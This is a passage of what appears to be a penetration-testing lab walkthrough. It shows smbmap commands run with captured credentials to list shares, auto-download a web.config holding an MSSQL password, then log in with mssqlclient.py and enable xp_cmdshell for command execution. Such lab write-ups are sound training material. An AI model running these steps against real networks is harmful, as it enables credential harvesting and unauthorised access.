Credentials obtained

We have the username and password for a new user.

So now it will be more enumerations. In the question it says 'Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file?'

That means we have to enumerate for files and file shares. Lets use smbmap first to list the shares and their permissions

smbmap -u BR086 -p Welcome1 -H 172.16.7.3
[+] IP: 172.16.7.3:445  Name: inlanefreight.local                               
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        Department Shares                                       READ ONLY       Share for department users
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share

Lets look at Department Shares directory first:

smbmap -u BR086 -p Welcome1 -H 172.16.7.3 -R "Department Shares"
[+] IP: 172.16.7.3:445  Name: inlanefreight.local                               
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Department Shares                                       READ ONLY
        .\Department Shares\*
        dr--r--r--                0 Fri Apr  1 11:04:17 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:17 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    Accounting
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    Executives
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    Finance
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    HR
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    IT
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    Marketing
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    R&D
        .\Department Shares\Accounting\*
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:51 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:17 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:54 2022    Public
        .\Department Shares\Executives\*
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:46 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:15 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:49 2022    Public
        .\Department Shares\Finance\*
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:41 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:12 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:43 2022    Public
        .\Department Shares\HR\*
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:25 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:04 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:27 2022    Public
        .\Department Shares\IT\*
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:19 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:22 2022    Public
        .\Department Shares\IT\Private\*
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:56 2022    ..
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    Development
        .\Department Shares\IT\Private\Development\*
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:59 2022    ..
        fr--r--r--             1203 Fri Apr  1 11:05:02 2022    web.config
        .\Department Shares\Marketing\*
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:35 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:10 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:38 2022    Public
        .\Department Shares\R&D\*
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    .
        dr--r--r--                0 Fri Apr  1 11:04:30 2022    ..
        dr--r--r--                0 Fri Apr  1 11:05:07 2022    Private
        dr--r--r--                0 Fri Apr  1 11:04:33 2022    Public

We got a .config file. Lets download it using smbmap -A option:

-A PATTERN            Define a file name pattern (regex) that auto downloads a file on a match (requires -r), not case sensitive, ex '(web|global).(asax|config)'

smbmap -u BR086 -p Welcome1 -H 172.16.7.3 -R "Department Shares" -A web.config

Once we open the file we get both the username and password for the SQL database. Lets use mssqlclient.py to authenticate.

AD Lateral Movement

mssqlclient.py INLANEFREIGHT/[email protected]

Once we are in we can run cmd commands after typing enable_xp_cmdshell with the format xp_cmdshell whoami /priv.

PreviousEnum NextPrivilege Escalation

Last updated 1 year ago